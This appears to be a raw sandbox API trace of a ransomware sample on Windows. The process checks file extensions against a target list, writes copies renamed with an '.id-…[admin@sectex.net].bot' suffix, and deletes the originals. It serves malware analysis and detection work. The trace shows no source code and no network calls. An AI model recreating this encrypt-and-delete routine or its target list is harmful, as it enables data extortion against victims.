	[0045.201] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.201] lstrlenW (lpString=".docx") returned 5
	[0045.201] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.201] lstrlenW (lpString=".pdf") returned 4
	[0045.201] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.201] lstrlenW (lpString=".xls") returned 4
	[0045.201] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.201] lstrlenW (lpString=".xlsx") returned 5
	[0045.201] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.201] lstrlenW (lpString=".ppt") returned 4
	[0045.201] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.201] lstrlenW (lpString=".zip") returned 4
	[0045.201] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.201] lstrlenW (lpString=".rar") returned 4
	[0045.201] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.201] lstrlenW (lpString=".bz2") returned 4
	[0045.201] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.201] lstrlenW (lpString=".7z") returned 3
	[0045.201] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.201] lstrlenW (lpString=".dbf") returned 4
	[0045.201] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.201] lstrlenW (lpString=".1cd") returned 4
	[0045.201] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.201] lstrlenW (lpString=".jpg") returned 4
	[0045.201] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.202] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0045.202] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0045.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.202] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=15737) returned 1
	[0045.202] CloseHandle (hObject=0x1f8) returned 1
	[0045.202] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 0x20
	[0045.202] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.202] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.202] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.203] GetLastError () returned 0x0
	[0045.203] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x3d79, lpOverlapped=0x0) returned 1
	[0045.204] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x3d80, lpOverlapped=0x0) returned 1
	[0045.205] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.205] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.206] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.206] CloseHandle (hObject=0x1fc) returned 1
	[0045.206] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.206] SetEndOfFile (hFile=0x1f8) returned 1
	[0045.207] CloseHandle (hObject=0x1f8) returned 1
	[0045.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.207] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 1
	[0045.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.207] lstrlenW (lpString=".doc") returned 4
	[0045.207] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.207] lstrlenW (lpString=".docx") returned 5
	[0045.207] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.207] lstrlenW (lpString=".pdf") returned 4
	[0045.207] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.207] lstrlenW (lpString=".xls") returned 4
	[0045.207] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.207] lstrlenW (lpString=".xlsx") returned 5
	[0045.207] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.207] lstrlenW (lpString=".ppt") returned 4
	[0045.208] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.208] lstrlenW (lpString=".zip") returned 4
	[0045.208] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.208] lstrlenW (lpString=".rar") returned 4
	[0045.208] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.208] lstrlenW (lpString=".bz2") returned 4
	[0045.208] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.208] lstrlenW (lpString=".7z") returned 3
	[0045.208] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.208] lstrlenW (lpString=".dbf") returned 4
	[0045.208] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.208] lstrlenW (lpString=".1cd") returned 4
	[0045.208] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.208] lstrlenW (lpString=".jpg") returned 4
	[0045.208] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.208] lstrlenW (lpString=".doc") returned 4
	[0045.208] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.208] lstrlenW (lpString=".docx") returned 5
	[0045.208] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.208] lstrlenW (lpString=".pdf") returned 4
	[0045.208] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.208] lstrlenW (lpString=".xls") returned 4
	[0045.208] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.208] lstrlenW (lpString=".xlsx") returned 5
	[0045.208] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.208] lstrlenW (lpString=".ppt") returned 4
	[0045.208] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.208] lstrlenW (lpString=".zip") returned 4
	[0045.209] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.209] lstrlenW (lpString=".rar") returned 4
	[0045.209] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.209] lstrlenW (lpString=".bz2") returned 4
	[0045.209] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.209] lstrlenW (lpString=".7z") returned 3
	[0045.209] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.209] lstrlenW (lpString=".dbf") returned 4
	[0045.209] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.209] lstrlenW (lpString=".1cd") returned 4
	[0045.209] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76
	[0045.209] lstrlenW (lpString=".jpg") returned 4
	[0045.209] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.209] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0045.209] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0045.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.209] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=3970) returned 1
	[0045.210] CloseHandle (hObject=0x1f8) returned 1
	[0045.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 0x20
	[0045.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.210] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.210] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0045.212] GetLastError () returned 0x0
	[0045.212] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xf82, lpOverlapped=0x0) returned 1
	[0045.213] WriteFile (in: hFile=0x220, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xf90, lpOverlapped=0x0) returned 1
	[0045.214] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.214] WriteFile (in: hFile=0x220, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.214] SetEndOfFile (hFile=0x220) returned 1
	[0045.214] CloseHandle (hObject=0x220) returned 1
	[0045.215] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.215] SetEndOfFile (hFile=0x1f8) returned 1
	[0045.604] CloseHandle (hObject=0x1f8) returned 1
	[0045.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.605] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 1
	[0045.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.605] lstrlenW (lpString=".doc") returned 4
	[0045.605] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.605] lstrlenW (lpString=".docx") returned 5
	[0045.605] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.605] lstrlenW (lpString=".pdf") returned 4
	[0045.605] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.605] lstrlenW (lpString=".xls") returned 4
	[0045.605] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.606] lstrlenW (lpString=".xlsx") returned 5
	[0045.606] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.606] lstrlenW (lpString=".ppt") returned 4
	[0045.606] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.606] lstrlenW (lpString=".zip") returned 4
	[0045.606] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.606] lstrlenW (lpString=".rar") returned 4
	[0045.606] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.606] lstrlenW (lpString=".bz2") returned 4
	[0045.606] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.606] lstrlenW (lpString=".7z") returned 3
	[0045.606] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.606] lstrlenW (lpString=".dbf") returned 4
	[0045.606] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.606] lstrlenW (lpString=".1cd") returned 4
	[0045.606] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.606] lstrlenW (lpString=".jpg") returned 4
	[0045.606] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.606] lstrlenW (lpString=".doc") returned 4
	[0045.606] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.606] lstrlenW (lpString=".docx") returned 5
	[0045.606] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.606] lstrlenW (lpString=".pdf") returned 4
	[0045.606] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.606] lstrlenW (lpString=".xls") returned 4
	[0045.606] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.606] lstrlenW (lpString=".xlsx") returned 5
	[0045.607] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.607] lstrlenW (lpString=".ppt") returned 4
	[0045.607] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.607] lstrlenW (lpString=".zip") returned 4
	[0045.607] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.607] lstrlenW (lpString=".rar") returned 4
	[0045.607] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.607] lstrlenW (lpString=".bz2") returned 4
	[0045.607] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.607] lstrlenW (lpString=".7z") returned 3
	[0045.607] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.607] lstrlenW (lpString=".dbf") returned 4
	[0045.607] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.607] lstrlenW (lpString=".1cd") returned 4
	[0045.607] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76
	[0045.607] lstrlenW (lpString=".jpg") returned 4
	[0045.607] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.607] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0045.607] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0045.607] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0046.610] GetFileSizeEx (in: hFile=0x218, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=47962) returned 1
	[0046.610] CloseHandle (hObject=0x218) returned 1
	[0046.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 0x20
	[0046.611] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0046.611] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.611] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.611] GetLastError () returned 0x0
	[0046.611] ReadFile (in: hFile=0x218, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xbb5a, lpOverlapped=0x0) returned 1
	[0046.767] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xbb60, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xbb60, lpOverlapped=0x0) returned 1
	[0046.772] ReadFile (in: hFile=0x218, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.772] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0046.772] SetEndOfFile (hFile=0x1fc) returned 1
	[0046.772] CloseHandle (hObject=0x1fc) returned 1
	[0046.772] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.772] SetEndOfFile (hFile=0x218) returned 1
	[0046.773] CloseHandle (hObject=0x218) returned 1
	[0046.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0046.774] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png")) returned 1
	[0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.774] lstrlenW (lpString=".doc") returned 4
	[0046.774] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.774] lstrlenW (lpString=".docx") returned 5
	[0046.774] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.774] lstrlenW (lpString=".pdf") returned 4
	[0046.774] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.774] lstrlenW (lpString=".xls") returned 4
	[0046.774] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.774] lstrlenW (lpString=".xlsx") returned 5
	[0046.774] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.774] lstrlenW (lpString=".ppt") returned 4
	[0046.774] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.774] lstrlenW (lpString=".zip") returned 4
	[0046.774] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.774] lstrlenW (lpString=".rar") returned 4
	[0046.774] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.774] lstrlenW (lpString=".bz2") returned 4
	[0046.774] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.774] lstrlenW (lpString=".7z") returned 3
	[0046.774] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.774] lstrlenW (lpString=".dbf") returned 4
	[0046.774] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.774] lstrlenW (lpString=".1cd") returned 4
	[0046.774] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
